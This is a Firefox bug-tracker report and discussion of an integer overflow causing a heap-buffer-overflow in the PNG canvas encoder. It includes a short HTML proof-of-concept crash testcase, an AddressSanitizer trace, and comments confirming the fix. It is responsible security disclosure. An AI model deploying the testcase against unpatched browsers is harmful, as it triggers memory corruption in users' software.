1294662 - heap-buffer-overflow in nsPNGEncoder::AddImageFrame

Status: RESOLVED DUPLICATE of bug 1294677

(Core :: Graphics: Canvas2D, defect)

Description

[Nils]

An integer overflow vulnerability exists in nsPNGEncoder::AddImageFrame which results in a too small allocation resulting in a buffer overflow:

nsPNGEncoder.cpp:
282:    UniquePtr<uint8_t[]> row = MakeUnique<uint8_t[]>(aWidth * 4);

Similar constructs exist in the other encoders as well, even though I wasn't able to trigger a crash. e.g.:

http://searchfox.org/mozilla-central/source/image/encoders/bmp/nsBMPEncoder.cpp#191
http://searchfox.org/mozilla-central/source/image/encoders/jpeg/nsJPEGEncoder.cpp#172


The testcase crashes the latest 64-bit ASAN build of Firefox as follows:


crash.html:

<script>
        c=document.createElement('canvas');
        c.setAttribute('width',1073741831);
        c.setAttribute('height', 1);
        //c['mozGetAsFile'](undefined,14);
        c.toBlob(alert, "image/png");
</script>

Both mozGetAsFile and toBlob work. toBlob triggers the crash in a separate thread.


=================================================================
==31309==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300028df3f at pc 0x7f377fc951d1 bp 0x7f3763ffdc70 sp 0x7f3763ffdc68
WRITE of size 1 at 0x60300028df3f thread T34 (Encodin~able #1)
    #0 0x7f377fc951d0 in ConvertHostARGBRow /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/image/encoders/png/nsPNGEncoder.cpp:640:31
    #1 0x7f377fc951d0 in nsPNGEncoder::AddImageFrame(unsigned char const*, unsigned int, unsigned int, unsigned int, unsigned int, unsigned int, nsAString_internal const&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/image/encoders/png/nsPNGEncoder.cpp:284
    #2 0x7f377fc938f9 in nsPNGEncoder::InitFromData(unsigned char const*, unsigned int, unsigned int, unsigned int, unsigned int, unsigned int, nsAString_internal const&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/image/encoders/png/nsPNGEncoder.cpp:68:8
    #3 0x7f377ff4a6bd in mozilla::dom::ImageEncoder::ExtractDataInternal(nsAString_internal const&, nsAString_internal const&, unsigned char*, int, mozilla::gfx::IntSizeTyped<mozilla::gfx::UnknownUnits>, mozilla::layers::Image*, nsICanvasRenderingContextInternal*, mozilla::layers::AsyncCanvasRenderer*, nsIInputStream**, imgIEncoder*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/ImageEncoder.cpp:455:10
    #4 0x7f377ffb420b in mozilla::dom::EncodingRunnable::ProcessImageData(unsigned long*, void**) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/ImageEncoder.cpp:169:19
    #5 0x7f377ffacfd2 in mozilla::dom::EncodingRunnable::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/ImageEncoder.cpp:211:19
    #6 0x7f377d3bd50f in nsThreadPool::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThreadPool.cpp:227:7
    #7 0x7f377d3bdbfc in non-virtual thunk to nsThreadPool::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThreadPool.cpp:154:15
    #8 0x7f377d3b66b6 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:1068:7
    #9 0x7f377d434a9c in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290:10
    #10 0x7f377e18990c in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessagePump.cpp:354:20
    #11 0x7f377e0fd1f8 in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #12 0x7f377e0fd1f8 in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:225
    #13 0x7f377e0fd1f8 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:205
    #14 0x7f377d3b19d1 in nsThread::ThreadFunc(void*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:463:5
    #15 0x7f379627a378 in _pt_root /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:216:5
    #16 0x7f37998706f9 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76f9)
    #17 0x7f37988f9b5c in clone /build/glibc-GKVZIf/glibc-2.23/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:109

0x60300028df3f is located 3 bytes to the right of 28-byte region [0x60300028df20,0x60300028df3c)
allocated by thread T34 (Encodin~able #1) here:
    #0 0x4b247b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4e0bcd in moz_xmalloc /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f377fc94597 in operator new[] /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:205:12
    #3 0x7f377fc94597 in MakeUnique<unsigned char []> /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/UniquePtr.h:688
    #4 0x7f377fc94597 in nsPNGEncoder::AddImageFrame(unsigned char const*, unsigned int, unsigned int, unsigned int, unsigned int, unsigned int, nsAString_internal const&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/image/encoders/png/nsPNGEncoder.cpp:282
    #5 0x7f377fc938f9 in nsPNGEncoder::InitFromData(unsigned char const*, unsigned int, unsigned int, unsigned int, unsigned int, unsigned int, nsAString_internal const&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/image/encoders/png/nsPNGEncoder.cpp:68:8
    #6 0x7f377ff4a6bd in mozilla::dom::ImageEncoder::ExtractDataInternal(nsAString_internal const&, nsAString_internal const&, unsigned char*, int, mozilla::gfx::IntSizeTyped<mozilla::gfx::UnknownUnits>, mozilla::layers::Image*, nsICanvasRenderingContextInternal*, mozilla::layers::AsyncCanvasRenderer*, nsIInputStream**, imgIEncoder*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/ImageEncoder.cpp:455:10
    #7 0x7f377ffb420b in mozilla::dom::EncodingRunnable::ProcessImageData(unsigned long*, void**) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/ImageEncoder.cpp:169:19
    #8 0x7f377ffacfd2 in mozilla::dom::EncodingRunnable::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/ImageEncoder.cpp:211:19
    #9 0x7f377d3bd50f in nsThreadPool::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThreadPool.cpp:227:7
    #10 0x7f377d3bdbfc in non-virtual thunk to nsThreadPool::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThreadPool.cpp:154:15
    #11 0x7f377d3b66b6 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:1068:7
    #12 0x7f377d434a9c in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290:10
    #13 0x7f377e18990c in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessagePump.cpp:354:20
    #14 0x7f377e0fd1f8 in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #15 0x7f377e0fd1f8 in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:225
    #16 0x7f377e0fd1f8 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:205
    #17 0x7f377d3b19d1 in nsThread::ThreadFunc(void*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:463:5
    #18 0x7f379627a378 in _pt_root /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:216:5
    #19 0x7f37998706f9 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76f9)

Thread T34 (Encodin~able #1) created by T0 (Web Content) here:
    #0 0x49a839 in __interceptor_pthread_create /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:238:3
    #1 0x7f3796276f3f in _PR_CreateThread /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:457:14
    #2 0x7f3796276b4a in PR_CreateThread /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:548:12
    #3 0x7f377d3b315b in nsThread::Init() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:634:8
    #4 0x7f377d3ba87f in nsThreadManager::NewThread(unsigned int, unsigned int, nsIThread**) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThreadManager.cpp:253:17
    #5 0x7f377d3bc309 in nsThreadPool::PutEvent(already_AddRefed<nsIRunnable>, unsigned int) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThreadPool.cpp:106:3
    #6 0x7f377d3bdedf in nsThreadPool::Dispatch(already_AddRefed<nsIRunnable>, unsigned int) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThreadPool.cpp:276:5
    #7 0x7f377ff4c9fc in Dispatch /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/nsIEventTarget.h:37:14
    #8 0x7f377ff4c9fc in mozilla::dom::ImageEncoder::ExtractDataAsync(nsAString_internal&, nsAString_internal const&, bool, mozilla::UniquePtr<unsigned char [], mozilla::DefaultDelete<unsigned char []> >, int, mozilla::gfx::IntSizeTyped<mozilla::gfx::UnknownUnits>, mozilla::dom::EncodeCompleteCallback*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/ImageEncoder.cpp:328
    #9 0x7f378205b238 in mozilla::dom::CanvasRenderingContextHelper::ToBlob(JSContext*, nsIGlobalObject*, mozilla::dom::EncodeCompleteCallback*, nsAString_internal const&, JS::Handle<JS::Value>, mozilla::ErrorResult&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/canvas/CanvasRenderingContextHelper.cpp:114:9
    #10 0x7f378205ab01 in mozilla::dom::CanvasRenderingContextHelper::ToBlob(JSContext*, nsIGlobalObject*, mozilla::dom::FileCallback&, nsAString_internal const&, JS::Handle<JS::Value>, mozilla::ErrorResult&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/canvas/CanvasRenderingContextHelper.cpp:71:3
    #11 0x7f3782536fbe in mozilla::dom::HTMLCanvasElement::ToBlob(JSContext*, mozilla::dom::FileCallback&, nsAString_internal const&, JS::Handle<JS::Value>, mozilla::ErrorResult&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/html/HTMLCanvasElement.cpp:770:3
    #12 0x7f3781cdcd2a in mozilla::dom::HTMLCanvasElementBinding::toBlob(JSContext*, JS::Handle<JSObject*>, mozilla::dom::HTMLCanvasElement*, JSJitMethodCallArgs const&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dom/bindings/HTMLCanvasElementBinding.cpp:355:3
    #13 0x7f3781f5bf37 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/bindings/BindingUtils.cpp:2770:13
    #14 0x7f3787ed3a9b in CallJSNative /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jscntxtinlines.h:232:15
    #15 0x7f3787ed3a9b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:441
    #16 0x7f3787eba7b3 in CallFromStack /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:504:12
    #17 0x7f3787eba7b3 in Interpret(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:2873
    #18 0x7f3787ea0f8e in js::RunScript(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:399:12
    #19 0x7f3787ed6370 in js::ExecuteKernel(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value const&, js::AbstractFramePtr, JS::Value*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:679:15
    #20 0x7f3787ed6a9e in js::Execute(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:711:12
    #21 0x7f3787a03ece in Evaluate(JSContext*, JS::Handle<JSObject*>, JS::Handle<js::StaticScope*>, JS::ReadOnlyCompileOptions const&, JS::SourceBufferHolder&, JS::MutableHandle<JS::Value>) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jsapi.cpp:4434:19
    #22 0x7f3787a04a21 in Evaluate /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jsapi.cpp:4461:12
    #23 0x7f3787a04a21 in JS::Evaluate(JSContext*, JS::AutoVectorRooter<JSObject*>&, JS::ReadOnlyCompileOptions const&, JS::SourceBufferHolder&, JS::MutableHandle<JS::Value>) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jsapi.cpp:4522
    #24 0x7f3780201b4d in nsJSUtils::EvaluateString(JSContext*, JS::SourceBufferHolder&, JS::Handle<JSObject*>, JS::CompileOptions&, nsJSUtils::EvaluateOptions const&, JS::MutableHandle<JS::Value>, void**) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsJSUtils.cpp:206:12
    #25 0x7f378020263f in nsJSUtils::EvaluateString(JSContext*, JS::SourceBufferHolder&, JS::Handle<JSObject*>, JS::CompileOptions&, void**) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsJSUtils.cpp:266:10
    #26 0x7f378028bba7 in nsScriptLoader::EvaluateScript(nsScriptLoadRequest*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsScriptLoader.cpp:2037:12
    #27 0x7f37802889fa in nsScriptLoader::ProcessRequest(nsScriptLoadRequest*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsScriptLoader.cpp:1836:10
    #28 0x7f37802722ee in nsScriptLoader::ProcessScriptElement(nsIScriptElement*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsScriptLoader.cpp:1574:10
    #29 0x7f378026ea82 in nsScriptElement::MaybeProcessScript() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsScriptElement.cpp:141:10
    #30 0x7f377f396ed4 in AttemptToExecute /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsIScriptElement.h:222:18
    #31 0x7f377f396ed4 in nsHtml5TreeOpExecutor::RunScript(nsIContent*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:664
    #32 0x7f377f3956a1 in nsHtml5TreeOpExecutor::RunFlushLoop() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:488:7
    #33 0x7f377f399efb in nsHtml5ExecutorFlusher::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/parser/html/nsHtml5StreamParser.cpp:128:9
    #34 0x7f377d3b66b6 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:1068:7
    #35 0x7f377d434a9c in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290:10
    #36 0x7f377e1884ef in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessagePump.cpp:100:21
    #37 0x7f377e0fd1f8 in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #38 0x7f377e0fd1f8 in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:225
    #39 0x7f377e0fd1f8 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:205
    #40 0x7f3783c0e49f in nsBaseAppShell::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/widget/nsBaseAppShell.cpp:156:3
    #41 0x7f3785cb6587 in XRE_RunAppShell /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:851:12
    #42 0x7f377e0fd1f8 in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #43 0x7f377e0fd1f8 in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:225
    #44 0x7f377e0fd1f8 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:205
    #45 0x7f3785cb5c23 in XRE_InitChildProcess /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:681:7
    #46 0x4dfb2b in content_process_main /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:224:19
    #47 0x4dfb2b in main /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/browser/app/nsBrowserApp.cpp:357
    #48 0x7f379881382f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291

SUMMARY: AddressSanitizer: heap-buffer-overflow /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/image/encoders/png/nsPNGEncoder.cpp:640:31 in ConvertHostARGBRow
Shadow bytes around the buggy address:
  0x0c0680049b90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0680049ba0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0680049bb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0680049bc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0680049bd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c0680049be0: fa fa fa fa 00 00 00[04]fa fa 00 00 00 00 fa fa
  0x0c0680049bf0: 00 00 04 fa fa fa fd fd fd fd fa fa fd fd fd fd
  0x0c0680049c00: fa fa 00 00 00 00 fa fa fd fd fd fa fa fa 00 00
  0x0c0680049c10: 00 06 fa fa 00 00 00 00 fa fa 00 00 00 fa fa fa
  0x0c0680049c20: 00 00 00 00 fa fa 00 00 00 04 fa fa 00 00 00 00
  0x0c0680049c30: fa fa 00 00 00 04 fa fa 00 00 00 00 fa fa fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==31309==ABORTING

Comment 1

[Nils]

Attachment: crash.html (testcase, crashes firefox)

Comment 2

[Nils]

I was also able to trigger a similar bug in the BMP encoder. See https://bugzilla.mozilla.org/show_bug.cgi?id=1294677

Comment 3

[Daniel Veditz [:dveditz]]

Assigning Milan since he assigned himself to the BMP one.

Comment 4

[Milan Sreckovic [:milan] (needinfo for best results)]

(In reply to Daniel Veditz [:dveditz] from comment #3)
> Assigning Milan since he assigned himself to the BMP one.

Thanks.  It's fixed by the same patch as bug 1294677.

Comment 5

[Al Billings [:abillings - ex-MoCo]]

Nils, bug 1294677 is about to land. Once it lands, can you confirm that it fixes this manifestation?

Comment 6

[Al Billings [:abillings - ex-MoCo]]

Nils?

Comment 7

[Nils]

I wasn't able to test this with an ASAN build as the tinderbox mozilla-central ASAN builds seem to be broken for a while now ...

However this issue did crash a non ASAN build before the fix and I can confirm that the latest build does not crash anymore.

Comment 8

[Al Billings [:abillings - ex-MoCo]]

(In reply to Nils from comment #7)
> I wasn't able to test this with an ASAN build as the tinderbox
> mozilla-central ASAN builds seem to be broken for a while now ...
> 

They're not "broken." They're no longer maintained. ASAN builds have been made by Task Cluster for a while. Our Release Engineering team changed the process.

This was sent out to my team by Decoder:

Manual browsing:

1. Go to
https://tools.taskcluster.net/index/artifacts/#gecko.v2.mozilla-central.latest.firefox/gecko.v2.mozilla-central.latest.firefox.linux64-asan-opt

2. On the right side, you will see the most recent build (the browser is
in "public/build/target.tar.bz2").

Automated downloading:

There is a JSON API for accessing the index and the artifacts of a task,
so you would have to:

1. Fetch
https://index.taskcluster.net/v1/task/gecko.v2.mozilla-central.latest.firefox.linux64-asan-opt

2. Extract the taskId from the response.

3. Fetch https://queue.taskcluster.net/v1/task/<TASKID>/artifacts
(replace <TASKID> with the id from the previous response).

4. Extract list of desired files and fetch them by appending them to the
previous URL, e.g. the browser will be at:
https://queue.taskcluster.net/v1/task/<TASKID>/artifacts/public/build/target.tar.bz2

Comment 9

[Nils]

awesome, thanks :)

Comment 10

[Al Billings [:abillings - ex-MoCo]]

Nils, I still need to know if this reproduces per comment 5 or if it is fixed.

Comment 11

[Nils]

I can confirm that this does not reproduce on a recent ASAN build as well.